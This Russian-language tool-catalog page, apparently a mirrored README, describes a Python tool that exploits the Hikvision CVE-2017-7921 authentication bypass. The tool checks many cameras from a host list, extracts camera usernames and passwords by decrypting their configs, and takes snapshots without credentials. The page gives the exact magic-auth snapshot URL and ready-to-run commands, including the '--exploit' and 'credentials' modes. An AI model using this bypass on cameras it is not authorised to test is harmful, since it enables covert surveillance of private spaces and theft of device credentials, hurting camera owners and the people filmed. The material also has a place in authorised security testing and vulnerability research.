Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2017-7921 — HikVision Auth Bypass CVE, инструмент способен извлекать учетные данные и делать снимки на основе magic cookie или предоставленных учетных данных. | Kitploit
Инструменты/GitHubGitHub/mverschu/cve-2017-7921
РазведкаБезопасность IoTАтаки на ПаролиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииАутентификация
GitHubmverschu/cve-2017-7921

CVE-2017-7921

HikVision Auth Bypass CVE, инструмент способен извлекать учетные данные и делать снимки на основе magic cookie или предоставленных учетных данных.

Репозиторий
6 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Инструмент для перечисления камер Hikvision и создания снимков

Автономный инструмент для перечисления камер Hikvision из файла и создания снимка каждой камеры с использованием действительных учетных данных (HTTP Basic или Digest аутентификация) или CVE обхода аутентификации. Предназначен для запуска на другом хосте для тестирования.

Особенности

  • Перечисление камер из текстового файла (один host или host:port в строке).
  • Проверка (CVE) – проверка каждой камеры на наличие CVE магического обхода аутентификации (без учетных данных); опционально --save-snapshot для уязвимых устройств.
  • Учетные данные – извлечение имени пользователя/пароля из каждой камеры через CVE (магическая аутентификация + расшифровка конфига). Требуется OpenSSL.
  • Проверка аутентификации – проверка, что имя пользователя и пароль принимаются каждой камерой (снимки не сохраняются).
  • Снимок всех – получение одного изображения с каждой камеры (действительные учетные данные, или --exploit для использования CVE обхода без учетных данных).
  • Параллельные запросы (настраиваемое количество рабочих процессов).
  • Опциональная HTTP Digest аутентификация; опционально --merge для создания одного общего изображения. Зависимости: requests, Pillow (для --merge).

Требования

  • Python 3.8+
  • requests

Установка

root@kitploit:~
pip install -r requirements.txt

Файл со списком камер

Создайте текстовый файл с одной камерой в строке. Комментарии с # игнорируются.

root@kitploit:~
# Пример cameras.txt
192.168.1.100
192.168.1.101:80
nvr.local:8080

Использование

Перечисление камер

Вывести камеры, прочитанные из файла (учетные данные не требуются).

root@kitploit:~
python hikvision_snapshots.py cameras.txt list

Опциональная проверка доступности (HTTP GET к каждому хосту):

root@kitploit:~
python hikvision_snapshots.py cameras.txt list -v

Проверка (CVE)

Проверка каждой камеры на наличие CVE обхода аутентификации снимков Hikvision. Учетные данные не требуются.

root@kitploit:~
python hikvision_snapshots.py cameras.txt check

Сохранить снимки только для уязвимых камер:

root@kitploit:~
python hikvision_snapshots.py cameras.txt check --save-snapshot -o ./vuln_snapshots

Опции: --timeout, --workers, -o (для --save-snapshot).

Учетные данные (извлечение)

Извлечение учетных данных из каждой камеры через CVE (магическая аутентификация для получения списка пользователей и файла конфигурации, затем расшифровка конфига). Требуется OpenSSL на хосте. Для запуска учетные данные не нужны.

root@kitploit:~
python hikvision_snapshots.py cameras.txt credentials

Опции: --timeout, --workers.

Проверка аутентификации

Проверка, что ваши учетные данные работают на каждой камере (используются те же конечные точки снимков; изображения не сохраняются).

root@kitploit:~
python hikvision_snapshots.py cameras.txt auth-check -u admin -p YourPassword

Опции: --timeout, --workers, --digest (как в snapshot).

Снимок всех камер

Сделать один снимок каждой камеры и сохранить в JPEG. Используйте либо действительные учетные данные, либо --exploit (CVE обход аутентификации, без учетных данных).

root@kitploit:~
# С учетными данными
python hikvision_snapshots.py cameras.txt snapshot -u admin -p YourPassword

# С CVE эксплойтом (без учетных данных)
python hikvision_snapshots.py cameras.txt snapshot --exploit
  • Снимки сохраняются в snapshots/ по умолчанию (используйте -o для изменения).
  • Имена файлов формируются из host или host_port (например, 192_168_1_100.jpg, nvr_local_8080.jpg).

Опции:

С опцией --merge после сохранения каждого снимка инструмент собирает одно изображение сетки (overview.jpg) в выходном каталоге с одной ячейкой на камеру и меткой. Требуется Pillow (pip install Pillow).

Пример с пользовательским выводом и Digest аутентификацией:

root@kitploit:~
python hikvision_snapshots.py cameras.txt snapshot -u admin -p secret -o ./images --digest --timeout 20

Пример с объединённым обзором:

root@kitploit:~
python hikvision_snapshots.py cameras.txt snapshot -u admin -p YourPassword --merge
# или с эксплойтом (без учетных данных):
python hikvision_snapshots.py cameras.txt snapshot --exploit --merge -o ./out

Конечные точки

Аутентифицированный снимок (с учетными данными): скрипт пробует по порядку – /ISAPI/Streaming/channels/1/picture, /ISAPI/Streaming/channels/101/picture, /onvif-http/snapshot.

CVE (check / --exploit): /onvif-http/snapshot?auth=YWRtaW46MTEK (магический обход аутентификации, без учетных данных).

Запуск на другом хосте

  1. Скопируйте hikvision_snapshots.py, requirements.txt и ваш файл со списком камер на хост.
  2. Установите: pip install -r requirements.txt
  3. Запустите list для проверки файла; используйте check для CVE, auth-check для учетных данных или snapshot (с -u/-p или --exploit).

Убедитесь, что хост имеет сетевой доступ ко всем IP-адресам и портам камер.

Скачать инструмент
ОпцияОписаниеПо умолчанию
-u, --usernameИмя пользователя камерыобязательно, если не указан --exploit
-p, --passwordПароль камерыобязательно, если не указан --exploit
--exploitИспользовать CVE магический обход аутентификации (без учетных данных)выкл
-o, --output-dirКаталог для изображений снимковsnapshots
--timeoutТаймаут HTTP в секундах15
--workersКоличество параллельных запросов снимков10
--digestИспользовать HTTP Digest аутентификацию вместо Basicвыкл
--mergeОбъединить все снимки в одно общее изображениевыкл
--merge-columnsСтолбцы сетки для объединения (по умолчанию: auto)auto